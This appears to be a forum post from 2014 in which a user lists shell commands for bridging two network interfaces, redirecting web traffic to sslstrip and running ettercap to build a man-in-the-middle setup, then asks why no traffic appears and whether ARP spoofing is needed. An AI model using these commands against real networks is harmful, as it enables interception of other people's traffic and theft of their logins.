3
« on: May 29, 2014, 09:21:41 am »
There is a computer with two interfaces I try to insert it in the middle of the line (try to implement MITM),
such as one interface it looks at the router and the other to look at another computer.
iptables --flush
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr bridge0
brctl addif bridge0 eth0
brctl addif bridge0 eth1
ifconfig bridge0 192.168.0.199 up
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i bridge0 -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
cd /pentest/web/sslstrip
perl sslstrip.py -l 8080
then I try to:
ettercap -Tq -i bridge0
But nothing happens(in the terminal where I ettercap run empty)
I need to implement prompt ARP spoofing or not? or not ..
because all traffic running through my bridge0 interface, I will be very grateful for the help.